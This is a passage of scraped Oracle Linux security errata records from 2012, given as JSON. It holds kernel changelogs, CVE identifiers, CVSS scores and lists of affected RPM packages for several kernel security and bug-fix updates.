14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [x86 ] fix fpu context corrupt when preempt in signal context [orabug 14038272]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printks when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.16.1.el5]\n- Revert: [fs] nfsd4: Remove check for a 32-bit cookie in nfsd4_readdir() (Eric Sandeen) [847943 784191]\n- Revert: [fs] add new FMODE flags: FMODE_32bithash and FMODE_64bithash (Eric Sandeen) [847943 784191]\n- Revert: [fs] nfsd: rename int access to int may_flags in nfsd_open() (Eric Sandeen) [847943 784191]\n- Revert: [fs] nfsd: vfs_llseek() with 32 or 64 bit offsets (hashes) (Eric Sandeen) [847943 784191]\n- Revert: [fs] vfs: add generic_file_llseek_size (Eric Sandeen) [847943 784191]\n- Revert: [s390/ppc64] add is_compat_task() for s390 and ppc64 (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext3: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: improve llseek error handling for large seek offsets (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- Revert: [fs] vfs: allow custom EOF in generic_file_llseek code (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: use core vfs llseek code for dir seeks (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext3: pass custom EOF to generic_file_llseek_size() (Eric Sandeen) [847943 784191]\n[2.6.18-308.15.1.el5]\n- [net] sfc: Fix max no of TSO segments and min TX queue size (Michal Schmidt) [845554 845555] {CVE-2012-3412}\n- [kernel] xacct_add_tsk: fix pure theoretical ->mm use-after-free (Nikola Pajkovsky) [849723 849725] {CVE-2012-3510}\n- [fs] hfsplus: Buffer overflow in the HFS plus filesystem (Jacob Tanenbaum) [820255 820256] {CVE-2012-2319}\n- [net] netfilter: add dscp netfilter match (Thomas Graf) [847327 842029]\n- [net] rds: set correct msg_namelen (Weiping Pan) [822727 822728] {CVE-2012-3430}\n- [misc] ERESTARTNOINTR seen from fork call in userspace (Oleg Nesterov) [847359 693822]\n- [fs] quota: manage reserved space when quota is not active (Eric Sandeen) [847326 818087]\n- [fs] quota: Fix warning if delayed write before quota is enabled (Eric Sandeen) [847326 818087]\n- [fs] ext3: pass custom EOF to generic_file_llseek_size() (Eric Sandeen) [847943 784191]\n- [fs] ext4: use core vfs llseek code for dir seeks (Eric Sandeen) [847943 784191]\n- [fs] vfs: allow custom EOF in generic_file_llseek code (Eric Sandeen) [847943 784191]\n- [fs] ext4: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- [fs] ext4: improve llseek error handling for large seek offsets (Eric Sandeen) [847943 784191]\n- [fs] ext3: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- [s390/ppc64] add is_compat_task() for s390 and ppc64 (Eric Sandeen) [847943 784191]\n- [fs] vfs: add generic_file_llseek_size (Eric Sandeen) [847943 784191]\n- [fs] nfsd: vfs_llseek() with 32 or 64 bit offsets (hashes) (Eric Sandeen) [847943 784191]\n- [fs] nfsd: rename int access to int may_flags in nfsd_open() (Eric Sandeen) [847943 784191]\n- [fs] add new FMODE flags: FMODE_32bithash and FMODE_64bithash (Eric Sandeen) [847943 784191]\n- [fs] nfsd4: Remove check for a 32-bit cookie in nfsd4_readdir() (Eric Sandeen) [847943 784191]\n- [xen] x86: whitelist Enhanced SpeedStep for dom0 (Laszlo Ersek) [846125 809103]\n[2.6.18-308.14.1.el5]\n- [net] e1000e: drop check of RXCW.CW to eliminate link up and down (Dean Nelson) [852448 840642]", "edition": 4, "reporter": "Oracle", "published": "2012-10-02T00:00:00", "title": "1 ", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2319", "CVE-2012-3510", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-10-02T00:00:00", "id": "ELSA-2012-1323-1", "href": "http://linux.oracle.com/errata/ELSA-2012-1323-1.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:07", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.37.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.37.1.el5uekdebug-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.37.1.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.37.1.el5uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.37.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.37.1.el5uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.37.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.32-300.37.1.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.37.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.37.1.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.37.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.37.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.37.1.el6uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.37.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.37.1.el6uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.37.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.37.1.el6uekdebug-1.5.7-0.1.i686.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.37.1.el5uek-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.37.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.37.1.el6uek-1.5.7-0.1.i686.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.37.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-headers-2.6.32-300.37.1.el5uek.i686.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.37.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.37.1.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.37.1.el5uekdebug-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.37.1.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.32-300.37.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.37.1.el6uekdebug-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.37.1.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.37.1.el6uek-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.37.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-headers-2.6.32-300.37.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.37.1.el5uekdebug-1.5.7-2.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.32-300.37.1.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.37.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.32-300.37.1.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.32-300.37.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.37.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.37.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.37.1.el5uek-1.5.7-2.i686.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.32-300.37.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.37.1.el6uekdebug-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.37.1.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.32-300.37.1.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.37.1.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.37.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.37.1.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.37.1.el6uek-1.5.7-0.1.src.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.37.1.el6uek-1.5.7-0.1.src.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.32-300.37.1.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.32-300.37.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-headers-2.6.32-300.37.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.37.1.el5uekdebug-1.5.7-2.i686.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.37.1.el5uek-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.37.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.37.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.37.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.37.1.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.32-300.37.1.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.32-300.37.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.37.1.el5uek-1.5.7-2.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-headers-2.6.32-300.37.1.el6uek.i686.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.37.1.el6uek-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.37.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.37.1.el5uek-1.5.7-2.src.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.37.1.el5uek-1.5.7-2.src.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.37.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.32-300.37.1.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.37.1.el6uek-1.5.7-0.1.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.37.1.el6uekdebug-1.5.7-0.1.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.37.1.el6uekdebug", "operator": "lt"}], "description": "[2.6.32-300.37.1.]\r\n- sfc: Replace some literal constants with EFX_PAGE_SIZE/EFX_BUF_SIZE (Ben Hutchings) [Orabug: 14769994]\r\n- CVE-2012-3412 sfc: Fix maximum number of TSO segments and minimum TX queue size (Ben Hutchings) [Orabug: 14769994] {CVE-2012-3412}\r\n \n[2.6.32-300.36.1.]\r\n- dl2k: Clean up rio_ioctl (Stephan Mueller) [Orabug: 14675306] {CVE-2012-2313}\r\n- hugetlb: fix resv_map leak in error path (Christoph Lameter) [Orabug: 14676403] {CVE-2012-2390}\r\n- rds: set correct msg_namelen (Jay Fenlason) [Orabug: 14676504] {CVE-2012-3430}\r\n \n[2.6.32-300.35.1.]\r\n- oracleasm: Bring driver in sync with UEK2 (Martin K. Petersen)\r\n- Fix system hang due to bad protection module parameters (CR 130769) (Martin\r\n K. Petersen)\r\n- sd: Avoid remapping bad reference tags (Martin K. Petersen)\r\n- block: Fix bad range check in bio_sector_offset (Martin K. Petersen)\r\n \n[2.6.32-300.34.1.]\r\n- htrimer: fix kabi breakage (Joe Jin)\r\n- 2.6.32.x: timekeeping: Add missing update call in timekeeping_resume()\r\n (Thomas Gleixner)\r\n- 2.6.32.x: hrtimer: Update hrtimer base offsets each hrtimer_interrupt (John\r\n Stultz)\r\n- 2.6.32.x: timekeeping: Provide hrtimer update function (Thomas Gleixner)\r\n- 2.6.32.x: hrtimers: Move lock held region in hrtimer_interrupt() (Thomas\r\n Gleixner)\r\n- 2.6.32.x: timekeeping: Maintain ktime_t based offsets for hrtimers (Thomas\r\n Gleixner)\r\n- 2.6.32.x: timekeeping: Fix leapsecond triggered load spike issue (John\r\n Stultz)\r\n- 2.6.32.x: hrtimer: Provide clock_was_set_delayed() (John Stultz)\r\n- 2.6.32.x: time: Move common updates to a function (Thomas Gleixner)\r\n- 2.6.32.x: timekeeping: Fix CLOCK_MONOTONIC inconsistency during leapsecond\r\n (John Stultz)\r\n- 2.6.32.x: ntp: Correct TAI offset during leap second (Richard Cochran)\r\n- 2.6.32.x: ntp: Fix leap-second hrtimer livelock (John Stultz)\r\n- Revert '2.6.32.x: hrtimer: Fix clock_was_set so it is safe to call from irq\r\n context' (Joe Jin)\r\n- Revert '2.6.32.x: time: Fix leapsecond triggered hrtimer/futex load spike\r\n issue' (Joe Jin)\r\n- Revert '2.6.32.x: hrtimer: Update hrtimer base offsets each\r\n hrtimer_interrupt' (Joe Jin)\r\n \n[2.6.32-300.33.1.]\r\n- mpt2sas: Update mpt2sas to 120.105.11.00 (Guru Anbalagane) [Orabug: 14376481]\r\n- Revert 'mpt2sas: update to 12.105.11.00' (Maxim Uvarov)\r", "edition": 3, "reporter": "Oracle", "published": "2012-10-18T00:00:00", "title": "Unbreakable Enterprise kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2390", "CVE-2012-2313", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-10-18T00:00:00", "id": "ELSA-2012-2038", "href": "http://linux.oracle.com/errata/ELSA-2012-2038.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:17", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageFilename": "python-perf-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageFilename": "python-perf-2.6.32-279.11.1.el6.i686.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-279.11.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-279.11.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-279.11.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-279.11.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-279.11.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-279.11.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-279.11.1.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-279.11.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageFilename": "perf-2.6.32-279.11.1.el6.i686.rpm", "packageName": "perf", "operator": "lt"}], "description": "[2.6.32-279.11.1.el6]\n- [net] core: Fix napi_gro_frags vs netpoll path (Amerigo Wang) [857854 845347]\n- [netdrv] benet: disable BH in callers of be_process_mcc() (Amerigo Wang) [857854 845347]\n- [net] bonding: remove IFF_IN_NETPOLL flag (Amerigo Wang) [857854 845347]\n- [mm] fix contig_page_data kABI breakage and related memory corruption (Satoru Moriya) [857012 853007]\n- [net] sctp: backport sctp cache ipv6 source after route lookup (Michele Baldessari) [858284 855759]\n- [net] sctp: backport support of sctp multi-homing ipv6 source address selection (Michele Baldessari) [858284 855759]\n- [net] ipv6: backport RTA_PREFSRC ipv6 source route selection support (Michele Baldessari) [858285 851118]\n- [netdrv] sfc: Fix maximum number of TSO segments and minimum TX queue size 